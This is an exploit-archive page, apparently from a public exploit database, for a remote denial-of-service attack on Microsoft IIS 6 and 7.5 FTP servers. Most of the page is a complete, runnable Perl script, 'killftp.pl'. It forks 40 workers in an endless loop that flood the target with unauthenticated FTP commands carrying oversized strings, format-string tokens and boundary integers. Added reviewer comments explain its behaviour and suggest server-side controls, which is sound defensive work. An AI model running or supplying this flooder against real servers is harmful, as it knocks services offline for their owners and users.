Microsoft IIS 6, 7.5 FTP Server Remote Denial Of Service

2012.07.04
Credit: coolkaveh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-399

# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
# Date: June 29, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command requests to a Microsoft IIS FTP Server
#CPU usage goes up to max capacity and server gets non responsive.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Reviewer summary (what the listing below does, read from the server side):
#  - After one reachability check, an endless loop forks worker processes,
#    capped at 40 concurrent children by Parallel::ForkManager(40).
#  - Each worker walks every (command, argument) pair and opens a new TCP
#    connection for each pair, sending exactly one FTP command line on it.
#    No USER/PASS exchange is sent first, so every command arrives on an
#    unauthenticated control connection.
#  - The arguments are runs of 'A' of increasing length, printf-style format
#    tokens and integer boundary values.
#  - Presumably the visible signature on the server is a burst of short-lived
#    control connections from one source, each carrying a single pre-login
#    command with an oversized or '%'-laden argument; per-source connection
#    limits and alerting on that pattern are the natural controls to verify.
#  - The script has no `use strict`; every variable except $pid is a package
#    global.
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;

# Unbuffered STDOUT so status lines appear immediately.
$|=1;

# Prints the usage banner. Not called anywhere in this listing; the same text
# is printed inline in the missing-host branch below.
sub usage {
    print "Please DISABLE firewall daemon of this operating system first!\n";
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl killftp.pl <host> \n";
    print "example: perl killftp.pl www.example.com \n";
}

# Positional arguments: host (required) and port (optional, defaults to "21").
$host=shift;
$port=shift || "21";

# No host given: print the banner and leave with exit status 0.
if(!defined($host)){
    print "Please DISABLE firewall daemon of this operating system first!\n";
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "coolkaveh () rocketmail com\n";
    print "usage: perl killftp.pl <host> \n";
    print "example: perl killftp.pl www.example.com \n";
    exit(0);
}

# Single TCP connect (60 s timeout) to confirm the port accepts connections;
# the script dies here if it does not.
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
    print "$host -> $port is alive.\n";
    $check_first->close;
}
else{
    die("$host -> $port is closed!\n");
}

# Argument strings appended to each command: 'A' runs from 5 to 12288 bytes,
# format-specifier sequences, and decimal/hex integer boundary values.
@junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,
'A'x12288,'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
);

# FTP command verbs to send. The same roughly 25 verbs are repeated many times,
# so the list only lengthens each worker's run; it adds no new command types
# apart from the final 'REST'.
# NOTE(review): one 'TYPE I' entry near the end of the list is split across a
# line break in this copy of the listing; the break is kept exactly as it
# appears on the page.
@command=(
'NLST','CWD','STOR','RETR',
'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD',
'RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM',
'SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E',
'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
'TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE 
I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E',
'TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
'TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD',
'DELE','RNFR',
'RNTO','LIST','MDTM','SIZE','REST'
);

print "Dosing Server!\n";

# Worker pool limited to 40 concurrent child processes.
$pm = new Parallel::ForkManager(40);

# Endless loop: the parent only forks; start() returns true in the parent
# (so it skips to the next iteration) and false in the child, which runs
# the body below and then exits through finish().
while (1) {
    my $pid = $pm->start and next;
    # The labels COMMAND_LIST and LABEL5 are never the target of a
    # next/last/goto in this listing.
    COMMAND_LIST: foreach $cmd (@command){
        foreach $poc (@junk){
            # One new TCP connection (30 s timeout) per command/argument pair.
            LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
            if(defined($sock4)){
                # Sends "<command> <argument>\r\n" with no preceding login;
                # whatever is received into $content is never examined.
                $sock4->send("$cmd"." "."$poc\r\n", 0);
                $sock4->recv($content, 0, 900);
            }
        }
    }
    $pm->finish;
}

References:

http://www.microsoft.com
https://twitter.com/coolkaveh

